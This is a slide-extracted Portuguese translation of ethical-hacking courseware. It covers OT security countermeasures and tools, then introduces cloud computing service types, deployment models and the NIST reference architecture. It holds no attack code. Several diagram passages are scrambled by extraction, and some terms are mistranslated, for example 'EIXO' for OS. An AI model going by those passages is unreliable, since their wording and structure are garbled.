ÿ Atualize os sistemas para as tecnologias mais recentes e repare os sistemas regularmente
ÿ Implementar configuração segura e práticas de codificação segura para aplicativos OT
ÿ Manter um registo patrimonial para rastrear a informação e escrutinar desatualizados e

sistemas sem suporte
ÿ Realizar monitoramento contínuo e detecção dos dados de log gerados pelos sistemas OT para detecção de
ataques em tempo real
ÿ Treinar funcionários com as mais recentes políticas de segurança e aumentar a conscientização sobre as últimas
ameaças e riscos
ÿ Use senhas fortes e seguras usando hash e altere o padrão de fábrica

senhas
ÿ Acesso remoto seguro por meio de várias camadas de defesa, implementando dois fatores
autenticação, VPNs, criptografia, firewalls, etc.

ÿ Implementar resposta a incidentes e planos de continuidade de negócios
ÿ Proteja o perímetro da rede para filtrar e impedir o tráfego de entrada não autorizado
ÿ Verifique regularmente sistemas e redes usando ferramentas anti-malware
ÿ Restrinja o tráfego de rede usando técnicas como limitação de taxa e lista branca para evitar
DoS e ataques de força bruta
ÿ Fortalecer os sistemas desativando serviços e funcionalidades não utilizados
ÿ Use apenas servidores da web de terceiros testados e familiares para servir os aplicativos da web do ICS
ÿ Garantir que os fornecedores de ICS adicionem assinaturas criptográficas às atualizações de aplicativos
ÿ Realizar auditorias periódicas de sistemas industriais para validar os controles de segurança, produção e
sistemas de gestão

Ferramentas de Segurança OT
A Flowmon capacita fabricantes e empresas de serviços públicos a garantir a

Flowmon confiabilidade de suas redes industriais para evitar o tempo de inatividade e a
interrupção da continuidade do serviço
tenable.ot
https:// www.tenable.com
Forescout
https:// www.forescout.com
PA-220R
https:// www.paloaltonetworks.com
Solução Fortinet ICS/SCADA

https:// www.fortinet.com
Nozomi Networks Guardian https://

www.nozominetworks.com
https:// www.flowmon.com
Ferramentas de Segurança OT
Discutidas abaixo estão várias ferramentas que você pode usar para proteger sistemas e redes OT:
ÿ Flowmon
Fonte: https:// www.flowmon.com
A Flowmon capacita fabricantes e empresas de serviços públicos a garantir a confiabilidade de suas redes
industriais com confiança para evitar o tempo de inatividade e a interrupção da continuidade do serviço.
Isso pode ser alcançado por meio de monitoramento contínuo e detecção de anomalias para que dispositivos
com defeito ou incidentes de segurança, como espionagem cibernética, zero-days ou malware, possam ser
relatados e corrigidos o mais rápido possível.

Figura 10.26: captura de tela do Flowmon
Listadas abaixo estão algumas ferramentas adicionais para proteger um ambiente OT:
ÿ tenable.ot (https:// www.tenable.com)
ÿ Forescout (https:// www.forescout.com)
ÿ PA-220R (https:// www.paloaltonetworks.com)
ÿ Solução Fortinet ICS/SCADA (https:// www.fortinet.com)
ÿ Nozomi Networks Guardian™ (https:// www.nozominetworks.com)

Resumo do Módulo
Neste módulo, discutimos os conceitos de IoT junto com a arquitetura de IoT e as
áreas de aplicação de IoT
Também discutimos em detalhes várias ameaças e ataques a redes e dispositivos IoT
Este módulo também ilustrou várias ferramentas de ataque IoT
Neste módulo, também discutimos várias contramedidas a serem empregadas para evitar
tentativas de invasão de rede IoT por agentes de ameaças
Também discutimos em detalhes como proteger redes e dispositivos IoT usando
ferramentas de segurança IoT
Este módulo também discutiu os conceitos de OT junto com ameaças e ataques de OT
Também discutimos várias contramedidas para se defender contra ataques OT
Este módulo terminou com uma demonstração das ferramentas de segurança OT
No próximo módulo, discutiremos em detalhes várias ameaças e contramedidas da computação

em nuvem
Resumo do Módulo
Neste módulo, discutimos os conceitos de IoT junto com a arquitetura de IoT e as áreas de aplicação de IoT. Ele
também discutiu em detalhes as várias ameaças e ataques a redes e dispositivos IoT.
Este módulo também ilustrou várias ferramentas de ataque IoT. Este módulo também discutiu vários
contramedidas a serem empregadas para impedir tentativas de invasão de rede IoT por agentes de ameaças. Ele
também discutiu em detalhes como proteger redes e dispositivos IoT usando ferramentas de segurança IoT.
Além disso, este módulo discutiu os conceitos de OT juntamente com as ameaças e ataques de OT. Também discutiu
várias contramedidas para se defender contra ataques OT. O módulo terminou com uma demonstração das
ferramentas de segurança OT.
No próximo módulo, discutiremos em detalhes várias ameaças de computação em nuvem e

contramedidas.
MT
EC-Council
CE-Conselho
E
Ethical
HE
Hacking Essentials
Módulo 11
A m ea ç as e c on t r a m e di d as da c o m p u t a ç ã o e m n u v e m

Ameaças e contramedidas de computação em nuvem
Compreendendo os conceitos de computação em nuvem
Visão geral da tecnologia de contêineres
Compreendendo as ameaças da computação em nuvem
Visão geral de ataques e ferramentas de nuvem
Compreendendo as contramedidas de ataque na nuvem
Visão geral de várias ferramentas de segurança de computação em nuvem
A computação em nuvem é uma tecnologia emergente que fornece serviços de computação, como aplicativos de negócios online,
armazenamento de dados online e webmail pela Internet. A implementação da nuvem permite uma força de trabalho distribuída, reduz
os gastos da organização, fornece segurança de dados, etc. Devido a esses benefícios, muitas organizações empresariais hoje em dia
estão migrando seus dados e infraestrutura para a nuvem. No entanto, o ambiente de nuvem também apresenta muitas ameaças e riscos
para as organizações. Os invasores visam vulnerabilidades no software em nuvem para obter acesso não autorizado aos dados valiosos
armazenados nele. No cenário atual, a segurança na nuvem desempenha um papel importante para indivíduos e empresas. Este módulo
discute as várias técnicas usadas para hackear o ambiente de nuvem, que revelam as vulnerabilidades subjacentes. Entender esses
ataques e vulnerabilidades ajuda tanto o provedor de serviços em nuvem quanto o cliente na implementação de políticas e medidas de
segurança apropriadas para proteger a infraestrutura de nuvem contra ameaças cibernéticas em evolução.
Este módulo começa com uma visão geral dos conceitos de computação em nuvem. Ele explica a tecnologia de contêiner e fornece uma
visão sobre as ameaças de computação em nuvem. Por fim, discute a segurança da computação em nuvem e as ferramentas necessárias
para atender aos requisitos de segurança.
Ao final deste módulo, você será capaz de
ÿ Entenda os conceitos de computação em nuvem ÿ Entenda
a tecnologia de contêineres ÿ Entenda as ameaças de
computação em nuvem ÿ Entenda os ataques de computação
em nuvem
ÿ Aplicar medidas de segurança de computação em nuvem
ÿ Use várias ferramentas de segurança de computação em nuvem

Fluxo do módulo
Entenda a Nuvem Entenda o Contêiner

Conceitos de computação
01 02 Tecnologia
Discutir ataque na nuvem Discutir Nuvem

Contramedidas
04 03
Ameaças Computacionais
Entenda os conceitos de computação em nuvem

A computação em nuvem fornece vários tipos de serviços e aplicativos pela Internet. Esses serviços permitem
que os usuários utilizem software e hardware gerenciados por terceiros em locais remotos. Os principais
provedores de serviços em nuvem incluem Google, Amazon e Microsoft.
Esta seção apresenta a computação em nuvem, os tipos de serviços de computação em nuvem, a separação de
responsabilidades, os modelos de implantação em nuvem, a arquitetura de referência de implantação em nuvem
NIST, a arquitetura de armazenamento em nuvem e os provedores de serviços em nuvem.

Introdução à Computação em Nuvem

ÿ A computação em nuvem é uma entrega sob demanda de recursos de TI em que a infraestrutura e os aplicativos
de TI são fornecidos aos assinantes como um serviço medido em uma rede
Características da Computação em Nuvem
1 Autoatendimento sob demanda 5 Amplo acesso à rede
2 armazenamento distribuído 6 Agrupamento de recursos
3 Elasticidade rápida
7 serviço medido
4 Gerenciamento automatizado 8 Tecnologia de virtualização
Introdução à Computação em Nuvem
A computação em nuvem é uma entrega sob demanda de recursos de TI, na qual a infraestrutura e os aplicativos de TI
são fornecidos aos assinantes como serviços medidos nas redes. Exemplos de soluções em nuvem incluem Google
Cloud Platform, Amazon Web Service (AWS), Microsoft Azure e IBM Cloud.
Características da Computação em Nuvem
Discutidas abaixo estão as características da computação em nuvem que atraem muitas empresas hoje para adotar a
tecnologia de nuvem.
ÿ Autoatendimento sob demanda: Tipo de serviço prestado por provedores de serviços em nuvem que permite o
provisionamento de recursos de nuvem, como poder computacional, armazenamento e rede, sempre sob
demanda, sem a necessidade de interação humana com os provedores de serviços.
ÿ Armazenamento distribuído : O armazenamento distribuído na nuvem oferece melhor escalabilidade, disponibilidade

e confiabilidade dos dados. No entanto, o armazenamento distribuído em nuvem pode potencialmente aumentar
as preocupações de segurança e conformidade.
ÿ Elasticidade rápida: a nuvem oferece provisionamento instantâneo de recursos para escalar rapidamente para
cima ou para baixo, de acordo com a demanda. Para os consumidores, os recursos disponíveis para
abastecimento parecem ser ilimitados e podem ser adquiridos em qualquer quantidade a qualquer momento.
ÿ Gerenciamento automatizado: Ao minimizar o envolvimento do usuário, a automação da nuvem acelera

o processo e reduz os custos de mão de obra e a possibilidade de erro humano.

ÿ Amplo acesso à rede: os recursos da nuvem estão disponíveis na rede e são acessados por meio de
procedimentos padrão por meio de uma ampla variedade de plataformas, incluindo laptops, telefones celulares
e assistentes digitais pessoais (PDAs).
ÿ Pool de recursos: o provedor de serviços em nuvem agrupa todos os recursos para atender a vários clientes no
ambiente multilocatário, com recursos físicos e virtuais atribuídos e reatribuídos dinamicamente sob demanda
pelo consumidor da nuvem.
ÿ Serviço medido: Os sistemas em nuvem empregam o método de medição “pay-per-use”.

Os assinantes pagam pelos serviços em nuvem por assinatura mensal ou de acordo com o uso de recursos,
como níveis de armazenamento, poder de processamento e largura de banda. Os provedores de serviços em
nuvem monitoram, controlam, relatam e cobram o consumo de recursos pelos clientes com total transparência.
ÿ Tecnologia de virtualização : A tecnologia de virtualização na nuvem permite o dimensionamento rápido de

recursos de uma forma que os ambientes não virtualizados não conseguem.
Limitações da computação em nuvem
ÿ Controle limitado e flexibilidade das organizações
ÿ Propensão a interrupções e outros problemas técnicos
ÿ Questões de segurança, privacidade e conformidade
ÿ Contratos e lock-ins
ÿ Dependência de conexões de rede
ÿ Vulnerabilidade potencial a ataques, pois todos os componentes estão online
ÿ Dificuldade na migração de um prestador de serviço para outro

Tipos de serviços de computação em nuvem

Infraestrutura como serviço (IaaS)
SYS
ADMINISTRADORES
Fornece máquinas virtuais e outros hardwares e sistemas operacionais abstratos que podem ser controlados por meio
de uma API de serviço , por exemplo, Amazon EC2, Microsoft OneDrive ou Rackspace
Plataforma como serviço (PaaS)
Oferece ferramentas de desenvolvimento, gerenciamento de configuração e plataformas de implantação sob demanda

DESENVOLVEDORES
que podem ser usadas pelos assinantes para desenvolver aplicativos personalizados
Por exemplo, Google App Engine, Salesforce ou Microsoft Azure
Software como serviço (SaaS)

FIM
CLIENTES
Oferece software para assinantes sob demanda pela Internet
Por exemplo, aplicativos de escritório baseados na Web, como Google Docs ou Calendar, Salesforce CRM ou Freshbooks
Tipos de serviços de computação em nuvem (continuação)
Identidade como serviço (IDaaS) FIM

Contêiner como serviço (CaaS)
ADMINISTRADORES
SISTEMA
DO CLIENTES
Oferece serviços IAM, incluindo SSO, MFA, IGA e Oferece virtualização de mecanismos de contêiner e
coleta de inteligência gerenciamento de contêineres, aplicativos e clusters por
meio de um portal da web ou API
Por exemplo, OneLogin, Centrify Identity Service,
Microsoft Azure Active Directory ou Okta Por exemplo, Amazon AWS EC2 ou Google Kubernetes
Engine (GKE)
FIM
Segurança como serviço (SECaaS) FIM
Função como serviço (FaaS)
CLIENTES
Fornece testes de penetração, autenticação, Fornece uma plataforma para desenvolver, executar e
CLIENTES
detecção de intrusão, antimalware, incidente de gerenciar funcionalidades de aplicativos para

segurança e serviços de gerenciamento de eventos Por microsserviços
exemplo, eSentire MDR, Switchfast Technologies, Por exemplo, AWS Lambda, Google Cloud Functions,
OneNeck IT Solutions ou McAfee Managed Security Microsoft Azure Functions ou Oracle Cloud Fn
Services
Tipos de serviços de computação em nuvem
Os serviços em nuvem são divididos amplamente nas seguintes categorias:
ÿ Infraestrutura como serviço (IaaS)
Este serviço de computação em nuvem permite que os assinantes usem recursos de TI fundamentais
sob demanda, como poder de computação, virtualização, armazenamento de dados e rede. Este serviço
fornece máquinas virtuais e outros hardwares e sistemas operacionais abstratos

(SOs), que podem ser controlados por meio de uma interface de programação de aplicativo (API) de serviço. Como os
provedores de serviços em nuvem são responsáveis pelo gerenciamento da infraestrutura subjacente de computação em
nuvem, os assinantes podem evitar custos de capital humano, hardware e outros (por exemplo, Amazon EC2, Microsoft
OneDrive, Rackspace).
Vantagens:
o Dimensionamento de infraestrutura dinâmica
o Tempo de atividade garantido
o Automação de tarefas administrativas
o Balanceamento elástico de carga (ELB)
o Serviços baseados em políticas
o Acessibilidade global
Desvantagens:
o A segurança do software está em alto risco (fornecedores terceirizados são mais propensos a ataques)
o Problemas de desempenho e velocidades de conexão lentas
ÿ Plataforma como Serviço (PaaS)
Esse tipo de serviço de computação em nuvem permite o desenvolvimento de aplicativos e serviços. Os assinantes não
precisam comprar e gerenciar o software e a infraestrutura abaixo dele, mas têm autoridade sobre os aplicativos implantados
e talvez as configurações do ambiente de hospedagem de aplicativos. Isso oferece ferramentas de desenvolvimento,
gerenciamento de configuração e plataformas de implantação sob demanda, que podem ser usadas pelos assinantes para
desenvolver aplicativos personalizados (por exemplo, Google App Engine, Salesforce, Microsoft Azure).
As vantagens de escrever aplicativos no ambiente PaaS incluem escalabilidade dinâmica, backups automatizados e outros
serviços de plataforma, sem a necessidade de codificar explicitamente para eles.
Vantagens:
o Implantação simplificada
o Funcionalidade comercial pré-criada
o Menor risco de segurança em comparação com IaaS
o Comunidade instantânea
o Modelo de pagamento por uso
o Escalabilidade
Desvantagens:
o Bloqueio do fornecedor
o Privacidade dos dados

o Integração com o restante dos aplicativos do sistema
ÿ Software como serviço (SaaS)
Este serviço de computação em nuvem oferece software aplicativo para assinantes sob demanda pela
Internet. O provedor cobra pelo serviço com base no pagamento por uso, por assinatura, por publicidade ou
por compartilhamento entre vários usuários (por exemplo, aplicativos de escritório baseados na Web, como
Google Docs ou Calendar, Salesforce CRM e Freshbooks).
Vantagens:
o Baixo custo
o Fácil administração
o Acessibilidade global
o Alta compatibilidade (não é necessário hardware ou software especializado)
Desvantagens:
o Problemas de segurança e latência
o Dependência total da Internet
o Alternar entre fornecedores de SaaS é difícil
ÿ Identidade como Serviço (IDaaS)
Este serviço de computação em nuvem oferece serviços de autenticação para as empresas assinantes e é
gerenciado por um fornecedor terceirizado para fornecer serviços de gerenciamento de identidade e acesso.
Ele fornece serviços como Single-Sign-On (SSO), Multi-Factor Authentication (MFA), Identity Governance and
Administration (IGA), gerenciamento de acesso e coleta de inteligência. Esses serviços permitem que os
assinantes acessem dados confidenciais com mais segurança dentro e fora do local (por exemplo, OneLogin,
Centrify Identity Service, Microsoft Azure Active Directory, Okta).
Vantagens:
o Baixo custo
o Segurança melhorada
o Simplifique a conformidade
o Tempo reduzido
o Gerenciamento central de contas de usuário
Desvantagens:
o A falha de um único servidor pode interromper o serviço ou criar redundância em outros

servidores de autenticação
o Vulnerável a ataques de sequestro de contas

ÿ Segurança como serviço (SECaaS)
Esse modelo de computação em nuvem integra serviços de segurança à infraestrutura corporativa de maneira
econômica. É desenvolvido com base em SaaS e não requer nenhum hardware ou equipamento físico.
Portanto, reduz drasticamente o custo em comparação com o gasto quando as organizações estabelecem
seus próprios recursos de segurança. Ele fornece serviços como teste de penetração, autenticação, detecção
de intrusão, antimalware, incidente de segurança e gerenciamento de eventos (por exemplo, eSentire MDR,
Switchfast Technologies, OneNeck IT Solutions, McAfee Managed Security Services).
Vantagens:
o Baixo custo
o Complexidade reduzida
o Proteção contínua
o Segurança aprimorada por meio da melhor experiência em segurança
o Ferramentas de segurança mais recentes e atualizadas
o Provisionamento rápido de usuários
o Maior agilidade
o Maior tempo em competências essenciais
Desvantagens:
o Aumento das superfícies de ataque e vulnerabilidades
o Perfil de risco desconhecido
o APIs inseguras
o Nenhuma personalização para as necessidades de negócios
o Vulnerável a ataques de sequestro de contas
ÿ Container-as-a-Service (CaaS)
Esse modelo de computação em nuvem fornece contêineres e clusters como um serviço para seus assinantes.
Ele fornece serviços como virtualização de mecanismos de contêineres, gerenciamento de contêineres,
aplicativos e clusters por meio de um portal da Web ou de uma API. Usando esses serviços, os assinantes
podem desenvolver aplicativos em contêineres avançados e escaláveis por meio da nuvem ou de data
centers locais. CaaS herda recursos de IaaS e PaaS (por exemplo, Amazon AWS EC2, Google Kubernetes
Engine (GKE)).
Vantagens:
o Desenvolvimento simplificado de aplicativos em contêineres
o Pagamento por recurso
o Maior qualidade
o Desenvolvimento de aplicativos portáteis e confiáveis

o Baixo custo
o Poucos recursos
o A falha do contêiner do aplicativo não afeta outros contêineres
o Segurança melhorada
o Gerenciamento de patches aprimorado
o Resposta aprimorada a bugs
o Alta escalabilidade
o Desenvolvimento simplificado
Desvantagens:
o Alta sobrecarga operacional
o A implantação da plataforma é de responsabilidade do desenvolvedor
ÿ Função como serviço (FaaS)
Este serviço de computação em nuvem fornece uma plataforma para desenvolver, executar e gerenciar
funcionalidades de aplicativos sem a complexidade de construir e manter a infraestrutura necessária (arquitetura
sem servidor). Esse modelo é usado principalmente no desenvolvimento de aplicativos para microsserviços.
Ele fornece funcionalidade sob demanda para os assinantes que desligam a infraestrutura de suporte e não
incorrem em cobranças quando não estão em uso. Ele fornece serviços de processamento de dados, como
serviços de Internet das Coisas (IoT) para dispositivos conectados, aplicativos móveis e web e processamento
em lote e fluxo (por exemplo, AWS Lambda, Google Cloud Functions, Microsoft Azure Functions, Oracle Cloud
Fn).
Vantagens:
o Pagamento por uso
o Baixo custo
o Atualizações de segurança eficientes
o Fácil implantação
o Alta escalabilidade
Desvantagens:
o Alta latência
o Limitações de memória
o Limitações de monitoramento e depuração
o Ferramentas e estruturas instáveis
o Bloqueio do fornecedor

Separação de responsabilidades na nuvem

Computação em Nuvem
Infraestrutura Plataforma Software

Local
como um serviço) (como serviço) (como serviço)
Formulários Formulários Formulários Formulários
Dados Dados Dados Dados
Tempo de execução Tempo de execução Tempo de execução Tempo de execução
Assinante
Middleware Middleware Middleware Middleware

Proprietários
recursos
de
EIXO EIXO EIXO EIXO
Serviço
virtualização virtualização virtualização virtualização Fornecedor
Servidores Servidores Servidores Servidores
Armazenar Armazenar Armazenar Armazenar
rede rede rede rede
Separação de responsabilidades na nuvem
Na computação em nuvem, a separação de responsabilidades de assinantes e provedores de serviços é essencial.

A separação de funções evita conflitos de interesses, atos ilegais, fraudes, abusos e erros e ajuda a identificar
falhas de controle de segurança, incluindo roubo de informações, violações de segurança e evasão de controles de
segurança. Também ajuda a restringir a quantidade de influência exercida por qualquer indivíduo e garante que não
haja responsabilidades conflitantes.
Existem basicamente três tipos de serviços em nuvem: IaaS, PaaS e SaaS. É essencial conhecer as limitações de
cada modelo de entrega de serviços em nuvem ao acessar nuvens específicas e seus modelos. A figura abaixo
ilustra a separação de responsabilidades de nuvem específicas para modelos de entrega de serviços.

Figura 11.1: Separação de responsabilidades de nuvem específicas para modelos de entrega de serviços

Modelos de implantação em nuvem

nuvem pública
Os serviços são prestados através de uma rede aberta ao uso público
Usuários encerrando o acesso
Usuários iniciando
Usuários públicos
Acesso
acessando a nuvem via rede
Computadores em uma rede que fornecem acesso
provedor de nuvem
Controlador de limite
Perímetro de segurança controlado por

assinante opcional
Novo
Usuários que acessam a nuvem dentro
hardware Hardware antigo
do perímetro de segurança
Fora das instalações do assinante
Modelos de implantação de nuvem (continuação)
nuvem privada
A infraestrutura de nuvem é operada apenas para uma única organização
Caminho de acesso legítimo
Controlador de limite
Perímetro de segurança controlado pelo assinante
Fora
Dentro nuvem privada
Bloqueado
Acesso
Usuários acessando a nuvem de dentro do

perímetro


(continua)
Perímetros de segurança
Organização A Organização A
Organização B Organização B
Organização C Organização C
Nuvem Comunitária
Dentro
ÿ Infraestrutura compartilhada entre várias Dentro
Fora Fora
organizações de uma comunidade Usuários acessando recursos de nuvem local Usuário que acessa a nuvem de
específica com preocupações comuns Usuários acessando recursos de nuvem remotos

dentro de seus perímetros
(segurança, compliance, jurisdição, etc.)

Empresas da comunidade que Empresas comunitárias
fornecem e consomem recursos de nuvem que consomem recursos
Híbrido Combinação de duas ou mais nuvens (privadas, comunitárias ou públicas) que permanecem
Nuvem entidades únicas, mas estão unidas, oferecendo assim os benefícios de vários modelos de implantação
Nuvem privada no local

Nuvem privada terceirizada
Nuvem da comunidade no local Nuvem comunitária terceirizada
nuvem pública


ÿ Ambiente heterogêneo dinâmico que combina cargas de trabalho em vários fornecedores
multi
de nuvem, gerenciados por meio de uma interface proprietária para atingir metas de negócios
Nuvem
de longo prazo
dados de aplicativos dados de aplicativos
nuvem pública nuvem pública
dados de aplicativos dados de aplicativos
nuvem pública nuvem privada
Empresas/usuários que
consomem recursos de nuvem
A seleção do modelo de implementação em nuvem é baseada nos requisitos da empresa. Pode-se implantar serviços em nuvem
de diferentes maneiras, de acordo com os fatores abaixo:
ÿ Localização do host de serviços de computação em nuvem
ÿ Requisitos de segurança
ÿ Compartilhamento de serviços em nuvem
ÿ Capacidade de gerenciar alguns ou todos os serviços em nuvem
ÿ Capacidades de personalização
Os cinco modelos de implantação de nuvem padrão são
ÿ Nuvem Pública
Nesse modelo, o provedor disponibiliza serviços como aplicativos, servidores e armazenamento de dados ao público
pela Internet. Portanto, ele é responsável pela criação e manutenção constante da nuvem pública e de seus recursos
de TI. Os serviços de nuvem pública podem ser gratuitos ou baseados em um modelo de pagamento por uso (por
exemplo, Amazon Elastic Compute Cloud (EC2), Google App Engine, Microsoft Azure, IBM Cloud).
Vantagens :
• Simplicidade e eficiência
• Baixo custo
• Tempo reduzido (quando o servidor trava, precisa reiniciar ou reconfigurar a nuvem)
• Sem manutenção (o serviço de nuvem pública é hospedado fora do local)

• Sem contratos (sem compromissos de longo prazo)
o Desvantagens:
• A segurança não é garantida
• Falta de controle (fornecedores terceirizados estão no comando)
• Velocidade lenta (depende de conexões com a Internet; a taxa de transferência de dados é limitada)
Figura 11.2: Modelo de implantação de nuvem pública
ÿ Nuvem Privada
Uma nuvem privada, também conhecida como nuvem interna ou corporativa, é uma infraestrutura de nuvem
operada por uma única organização e implementada dentro de um firewall corporativo.
As organizações implantam infraestruturas de nuvem privada para manter o controle total sobre os dados
corporativos (por exemplo, BMC Software, VMware vRealize Suite, SAP Cloud Platform).
Vantagens :
• Aprimoramento da segurança (os serviços são dedicados a uma única organização)
• Maior controle sobre os recursos (a organização está no comando)
• Alto desempenho (a implantação da nuvem dentro do firewall implica alta

taxas de transferência)
• Desempenho personalizável de hardware, rede e armazenamento (conforme a organização

possui nuvem privada)
• Os dados de conformidade com Sarbanes Oxley, PCI DSS e HIPAA são muito mais fáceis de obter

o Desvantagens:
• Alto custo
• Manutenção no local
Figura 11.3: Modelo de implantação de nuvem privada
ÿ Nuvem Comunitária
É uma infraestrutura multilocatária compartilhada entre organizações de uma comunidade específica com
preocupações comuns de computação, como segurança, conformidade regulamentar, requisitos de
desempenho e jurisdição. A nuvem da comunidade pode ser local ou externo e regida pelas organizações
participantes ou por um provedor de serviços gerenciado terceirizado (por exemplo, Optum Health Cloud,
Salesforce Health Cloud).
Vantagens :
• Mais barato em comparação com a nuvem privada
• Flexibilidade para atender as necessidades da comunidade
• Cumprimento das normas legais
• Alta escalabilidade
• As organizações podem compartilhar um conjunto de recursos de qualquer lugar via Internet
o Desvantagens:
• Competição entre consumidores no uso de recursos
• Previsão imprecisa dos recursos necessários

• Falta de personalidade jurídica em caso de responsabilidade
• Segurança moderada (outros inquilinos podem acessar dados)
• Preocupações de confiança e segurança entre os inquilinos
Figura 11.4: Modelo de implantação de nuvem comunitária
ÿ Nuvem Híbrida
É um ambiente de nuvem composto por duas ou mais nuvens (privadas, públicas ou comunitárias) que
permanecem como entidades únicas, mas estão unidas para oferecer os benefícios de vários modelos de
implantação. Nesse modelo, a organização disponibiliza e gerencia alguns recursos internamente e
fornece outros recursos externamente (por exemplo, Microsoft Azure, Zymr, Parangat, Logicalis).
Exemplo: uma organização realiza suas atividades críticas na nuvem privada (por exemplo, dados
operacionais do cliente) e atividades não críticas na nuvem pública.
Vantagens :
• Alta escalabilidade (contém nuvens públicas e privadas)
• Oferece recursos públicos seguros e escaláveis
• Alto nível de segurança (compreende nuvem privada)
• Permite reduzir e gerir o custo de acordo com os requisitos
o Desvantagens:
• A comunicação no nível da rede pode ser conflitante, pois usa

nuvens privadas

• Difícil de obter conformidade de dados
• Organização dependente da infraestrutura interna de TI em caso de interrupções (manter

redundância em centros de dados para superar)
• Complexos acordos de nível de serviço (SLAs)
Figura 11.5: modelo de implantação de nuvem híbrida
ÿ Multinuvem
É um ambiente heterogêneo dinâmico que combina cargas de trabalho em vários fornecedores de nuvem
que são gerenciados por meio de uma interface proprietária para atingir metas de negócios de longo prazo.
A multinuvem usa vários serviços de computação e armazenamento de diferentes fornecedores de nuvem.
Ele distribui ativos de nuvem, software, aplicativos, etc. em vários ambientes de hospedagem em nuvem.
Os ambientes multinuvem são, em sua maioria, totalmente privados, totalmente públicos ou uma combinação
de ambos. As organizações usam ambientes de várias nuvens para distribuir recursos de computação,
aumentando assim o poder de computação e os recursos de armazenamento e limitando a perda de dados
e o risco de tempo de inatividade em grande medida (por exemplo, Microsoft Azure Arc, AWS Kaavo IMOD,
Google Cloud Anthos).
Vantagens :
• Alta confiabilidade e baixa latência
• Flexibilidade para atender às necessidades do negócio
• Otimização de custo-desempenho e mitigação de riscos
• Baixo risco de ataques distribuídos de negação de serviço (DDoS)
• Maior disponibilidade de armazenamento e poder de computação

• Baixa probabilidade de bloqueio do fornecedor
o Desvantagens:
• A falha do sistema multi-nuvem afeta a agilidade dos negócios
• Usar mais de um provedor causa redundância
• Riscos de segurança devido à superfície de ataque complexa e grande
• Custo operacional
Figura 11.6: modelo de implantação de várias nuvens

Arquitetura de referência de implantação de nuvem NIST

A arquitetura de referência de computação em nuvem do NIST define cinco atores principais:
Consumidor de Nuvem
Uma pessoa ou organização que usa serviços de computação

em nuvem provedor de nuvem
provedor de nuvem Camada de serviço Serviço na nuvem
Consumidor de Nuvem Gerenciamento

Uma pessoa ou organização que presta serviços às SaaS Corretor de Nuvem
partes interessadas
Auditor de Nuvem PaaS Suporte de negócios Serviço
IaaS intermediação
operadora de nuvem
auditoria de segurança Segurança
Privacidade
Um intermediário para fornecer conectividade e Provisionamento/

Serviço
Abstração de Recursos e Configuração
serviços de transporte entre consumidores e provedores Privacidade
Agregação
Auditoria de impacto Camada de Controle
de nuvem
atuação Portabilidade/
Camada de Recursos Físicos Serviço
Auditor de Nuvem auditoria Interoperabilidade
Arbitragem
hardware
Uma parte para fazer avaliações independentes dos
controles do serviço de nuvem e emitir uma opinião sobre isso Instalação
Corretor de Nuvem
Uma entidade que gerencia serviços de nuvem em termos operadora de nuvem
de uso, desempenho e entrega, e mantém o relacionamento

entre provedores de nuvem e
consumidores
Arquitetura de referência de implantação de nuvem NIST

A figura abaixo fornece uma visão geral da arquitetura de referência de computação em nuvem
do NIST; ele exibe os principais atores, atividades e funções na computação em nuvem. O
diagrama ilustra uma arquitetura genérica de alto nível, destinada a entender melhor os usos,
requisitos, características e padrões da computação em nuvem.
Figura 11.7: Arquitetura de referência de computação em nuvem NIST

Os cinco atores significativos são os seguintes:
ÿ Consumidor Nuvem
Um consumidor de nuvem é uma pessoa ou organização que mantém um relacionamento comercial com os
provedores de serviços de nuvem (CSPs) e utiliza os serviços de computação em nuvem. O consumidor de nuvem
navega nas solicitações do catálogo de serviços do CSP para os serviços desejados, estabelece contratos de
serviço com o CSP (diretamente ou por meio do agente de nuvem) e usa os serviços.
O CSP cobra o consumidor com base nos serviços prestados. O CSP deve cumprir o contrato de nível de serviço
(SLA) no qual o consumidor de nuvem especifica os requisitos técnicos de desempenho, como qualidade de
serviço, segurança e remédios para falha de desempenho. O CSP também pode definir limitações e obrigações,
se houver, que os consumidores de nuvem devem aceitar.
Os serviços disponíveis para um consumidor de nuvem nos modelos PaaS, IaaS e SaaS são os seguintes:
o PaaS – banco de dados (DB), inteligência de negócios, implantação de aplicativos, desenvolvimento

e teste e integração
o IaaS – armazenamento, gerenciamento de serviços, rede de entrega de conteúdo (CDN), plataforma

hospedagem, backup e recuperação e computação
o SaaS – recursos humanos, planejamento de recursos empresariais (ERP), vendas, gerenciamento de

relacionamento com clientes (CRM), colaboração, gerenciamento de documentos, e-mail e produtividade de
escritório, gerenciamento de conteúdo, serviços financeiros e redes sociais.
ÿ Provedor de Nuvem
Um provedor de nuvem é uma pessoa ou organização que adquire e gerencia a infraestrutura de computação
destinada a fornecer serviços (diretamente ou por meio de um agente de nuvem) às partes interessadas por meio
de acesso à rede.
ÿ Operador de Nuvem
Um provedor de nuvem atua como um intermediário que fornece conectividade e serviços de transporte entre CSPs
e consumidores de nuvem. A operadora de nuvem fornece acesso aos consumidores por meio de uma rede,
telecomunicações ou outros dispositivos de acesso.
ÿ Auditor Nuvem
Um auditor de nuvem é uma parte que realiza um exame independente dos controles do serviço de nuvem para
expressar uma opinião a respeito. As auditorias verificam a adesão aos padrões por meio de uma revisão das
evidências objetivas. Um auditor de nuvem pode avaliar os serviços fornecidos por um CSP em relação aos
controles de segurança (gerenciamento, salvaguardas operacionais e técnicas destinadas a proteger a
confidencialidade, integridade e disponibilidade do sistema e suas informações), impacto na privacidade
(conformidade com as leis e regulamentos de privacidade aplicáveis que regem a privacidade de um indivíduo),
desempenho, etc.

ÿ Agente de nuvem
A integração de serviços em nuvem está se tornando muito complicada para os consumidores gerenciarem. Assim, um
consumidor de nuvem pode solicitar serviços de nuvem de um agente de nuvem, em vez de entrar em contato
diretamente com um CSP. O agente de nuvem é uma entidade que gerencia os serviços de nuvem em relação ao uso,
desempenho e entrega e mantém o relacionamento entre CSPs e consumidores de nuvem.
Os serviços fornecidos pelos corretores de nuvem se enquadram em três categorias:
o Intermediação de Serviços
Melhora uma determinada função por um recurso específico e fornece serviços de valor agregado para
consumidores de nuvem.
o Agregação de Serviços
Combina e integra vários serviços em um ou mais novos serviços.
o Serviço de Arbitragem
Semelhante à agregação de serviços, mas sem a fixação dos serviços agregados (o agente de nuvem pode
escolher serviços de várias agências).

Arquitetura de armazenamento em nuvem
Arquitetura de armazenamento em nuvem de alto nível

O armazenamento em nuvem é um meio de armazenamento de dados
Front-end
usado para armazenar dados digitais em pools lógicos usando uma rede
APIs públicas para dados e gerenciamento
